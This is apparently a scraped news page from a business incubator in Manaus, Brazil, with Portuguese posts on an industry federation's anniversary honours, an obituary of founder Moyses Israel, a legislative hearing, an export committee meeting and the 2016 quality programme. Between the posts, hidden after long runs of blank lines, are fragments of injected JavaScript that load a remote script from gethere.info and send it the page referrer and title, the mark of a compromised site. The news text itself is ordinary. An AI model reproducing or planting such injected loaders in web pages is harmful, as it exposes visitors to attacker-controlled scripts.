Reconhecimento aos 56 e 36 anos de serviço

Nelson Azevedo recebeu uma placa comemorativa dos parlamentares do Amazonas
Nelson Azevedo recebeu uma placa comemorativa dos parlamentares do Amazonas

 

A Federação das Indústrias do Estado do Amazonas (FIEAM) e o Centro da Indústria do Estado do Amazonas (CIEAM), instituições que completam 56 anos e 36anos respectivamente este ano, foram homenageadas, na manhã de terça-feira, 30 de agosto, na Assembleia Legislativa do Estado do Amazonas (ALEAM).

 

A homenagem contou com as presenças de empresários, gestores estaduais e municipais, diretores de incubadoras de empresas, políticos, convidados e presidentes de instituições do setor fabril amazonense.

 

O primeiro vice-presidente da Federação das Indústrias do Estado do Amazonas (FIEAM), Nelson Azevedo, pediu o apoio do legislativo estadual para políticas públicas favoráveis a geração de emprego e renda, melhoria do transporte e logística, e uma racional Lei Ambiental. “Há 56 anos, a FIEAM defende a consolidação do nosso parque industrial, único modelo gerador de emprego e renda forte, mas também incentivamos ações para o desenvolvimento de novas matrizes econômicas, como a viabilização econômica do interior do Estado na busca pelo desenvolvimento da biotecnologia à base de nossa biodiversidade”, disse.

 

Nelson Azevedo destacou também a recente criação do Comitê de Apoio Ao Desenvolvimento do Agronegócio no Amazonas, uma iniciativa da Ação Empresarial que tem o objetivo de fortalecer as iniciativas de exploração sustentável do setor primário.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

A despedida do visionário

O idealizador do CIDE, em sua sala, na Federação das Indústrias do Estado do Amazonas (FIEAM).
O idealizador do CIDE, em sua sala, na Federação das Indústrias do Estado do Amazonas (FIEAM).

 

 

Faleceu na noite desta quinta-feira, 7, em Manaus, aos 92 anos de idade, o empresário Moyses Benarros Israel, um dos fundadores da Federação das Indústrias do estado do Amazonas (FIEAM), idealizador do Centro de Incubação e Desenvolvimento Empresarial (CIDE), membro do conselho estadual de notáveis e pessoa de destaque na vida econômica do Estado do Amazonas. O sepultamento estava marcado para às 10h, hoje, no Cemitério Israelita, na Zona Centro-Sul de Manaus.

 

O idealizador do CIDE, nasceu em Manaus, em 10 de fevereiro de 1924, era filho do casal Salomon e Carlota Israel, era um visionário que colocava suas ideias em prática. “Eu não inventei nada porque incubadoras de empresas já existiam em outros lugares. O que eu fiz foi aplicar conhecimentos adquiridos em minhas viagens ao Chile, a centros acadêmicos, em leituras pessoais sobre esse assunto e oferecer oportunidades à demanda local”, disse Israel em uma entrevista para o informativo da incubadora, em setembro do ano passado.

 

Moyses Israel contou que respirava empreendedorismo e sonhou em ser Químico Industrial e era o atual Vice-Presidente da FIEAM. “Eu comecei a trabalhar muito cedo, aos 11 anos de idade. Meu pai tinha um comércio e era representante de empresas. Após a morte dele, minha mãe alugou o negócio e fui trabalhar com os meus tios. A essa idade eu tinha de tirar a poeira do escritório, limpar o banheiro e abrir a porta para os funcionários. E, entregava protocolos. Paralelamente a essas atividades, eu estudava e fazia o curso de datilografia que, naquela época, era importantíssimo”, disse na entrevista.

 

HOMENAGEM

Em 2014, aos 90 anos, foi homenageado com uma biografia, com o livro “Moyses Israel”, da jornalista e historiadora Etelvina Garcia, que relata a trajetória da família e de suas atividades no segmento de exportação de castanha, borracha, juta, petróleo, madeira, entre outros produtos regionais que seguiam, principalmente para o mercado consumidor europeu.

Além da Indústria, o empresário também deu sua contribuição ao setor comercial do Estado, como diretor da Associação Comercial do Amazonas (ACA), por várias vezes.

DEFENSOR DO ENSINO

Como defensor do ensino superior no Estado, na década de 1990, fez a doação de área para a antiga Universidade do Amazonas (UA), atual Universidade Federal do Amazonas (UFAM), onde há incubadora de empresas. “As instituições de educação e pesquisa reconhecem a importância de ter incubadoras de empresas. É importante fomentar e desenvolver novas ideias, e contribuir com o desenvolvimento da sociedade”, disse ele.

Moyses Israel.
Moyses Israel.

 

 

Ao longo da sua trajetória, Moyses Israel foi homenageado diversas vezes.
Ao longo da sua trajetória, Moyses Israel foi homenageado diversas vezes.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

CIDE participa de audiência pública na ALEAM

O caderno de Economia do jornal A Crítica registrou a audiência.
O caderno de Economia do jornal A Crítica registrou a audiência.

 

Com o objetivo de participar da audiência pública sobre “um novo modelo econômico de gestão para o Distrito Industrial de Micro e Pequenas Empresas (DIMPE)”, o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, esteve na Assembleia Legislativa do Amazonas (ALE-AM), no último dia 20, participando da iniciativa do presidente da Associação do DIMPE, Mário Fogaça, e de políticos locais.

 

Segundo José Grosso, as incubadoras de empresas devem gerar desenvolvimento econômico. “Nesse primeiro momento, eu vim para conhecer os problemas pelos quais passam o DIMPE e desejo que encontremos uma solução que seja viável para todos”, finaliza.

 

Participaram também representantes da Superintendência da Zona Franca de Manaus (Suframa), Federação das Indústrias do Estado do Amazonas (Fieam), Federação da Agricultura e Pecuária do Amazonas (Faea) e representante do Governo Estadual.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comitê do PNCE orienta sobre cuidados sanitários nas exportações

Representantes de incubadoras de empresas, comércio e federações participam de encontro.
Representantes de incubadoras de empresas, comércio e federações participam de encontro.

 

 

Preocupado com fomentar e orientar a exportação de produtos locais, o Comitê Gestor e de Divulgação do Plano Nacional de Cultura Exportadora (PNCE) voltou a se reunir, na manhã desta terça-feira, 7, na Federação das Indústrias do Estado do Amazonas (FIEAM), para compartilhar orientações sobre o controle sanitário dos produtos.

 

O encontro contou com as participações de representantes de cooperativas, incubadoras de empresas, Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (Sebrae-AM), federações de comércio e Confederação Nacional da Indústria (CNI). “Para esta reunião trouxemos também representantes do Ministério da Agricultura, Pecuária e Abastecimento (MAPA) e da Agência Nacional de Vigilância Sanitária (Anvisa) para que eles falem sobre os cuidados e exigências que devem cumprir os futuros exportadores locais na hora de exportar seus produtos. Isso é importante”, diz a coordenadora do PNCE no Amazonas, Sandra Almeida.

 

Durante a reunião foram aprovados o projeto de divulgação e interiorização da cultura exportadora para os municípios do Amazonas e a realização de um seminário sobre cuidados sanitários, que acontecerá no próximo mês de julho.

PNCE1

 

 

 

PNCE2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

PQA 2016 abre inscrições para organizações públicas e privadas

Representantes de várias instituições compareceram ao lançamento do PQA 2016.
Representantes de várias instituições compareceram ao lançamento do PQA 2016.

 

 

Empresas instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) já podem fazer a inscrição para participar do Programa Qualidade Amazonas (PQA 2016), que foi lançado, na tarde da sexta-feira, 26, no auditório Auton Furtado Junior, no edifício da Federação das Indústrias do Estado do Amazona (FIEAM).

De acordo como a coordenadora do programa, Erlen Montefusco, qualquer organização particular e pública pode participar do processo. “Os participantes devem apresentar uma melhoria ou uma inovação, ou uma prática voltada para o desenvolvimento sustentável que cada um possa ter em sua organização. Então, elabora um relatório, um modelo de gestão”, enfatiza, acrescentando que existem a Modalidade Processo e a Modalidade Gestão e que os participantes não precisam ter a ISO (um conjunto de normas de padronização para um determinado serviço ou produto) ou nenhuma certificação obrigatória.

Na edição do ano passado, a empresa de moda esportiva, instalada no CIDE Alvora (CIDE2), Officina Sports, foi premiada na categoria Micro e Pequena Indústria, na modalidade Processo.

Ainda segundo Montefusco, a divulgação do resultado do PQA 2016 está prevista para o mês de setembro. Para mais informações, os interessados devem acessar ao site www.pqa.org.br ou ligar para os números 3622-6104 e 3186-6642.

O PROGRAMA QUALIDADE AMAZONASé apoiado pela FIEAM e trata-se de um programa estadual fundado em 1991, com o objetivo de apoiar as organizações, públicas e privadas, na busca pela qualidade, produtividade e competitividade, através do uso de métodos e ferramentas da qualidade e excelência na gestão.

 

 

A coordenadora do PQA 2016, Erlen Montefusco, dá início ao lançamento do programa.
A coordenadora do PQA 2016, Erlen Montefusco, dá início ao lançamento do programa.

 

 

 

Representantes de organizações aguardam o lançamento do PQA 2016, no auditório Auton Furtado Junior.
Representantes de organizações aguardam o lançamento do PQA 2016, no auditório Auton Furtado Junior.

 

 

 

Ganhadores de edições passadas relatam histórias de casos de sucessos.
Ganhadores de edições passadas relatam histórias de casos de sucessos.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);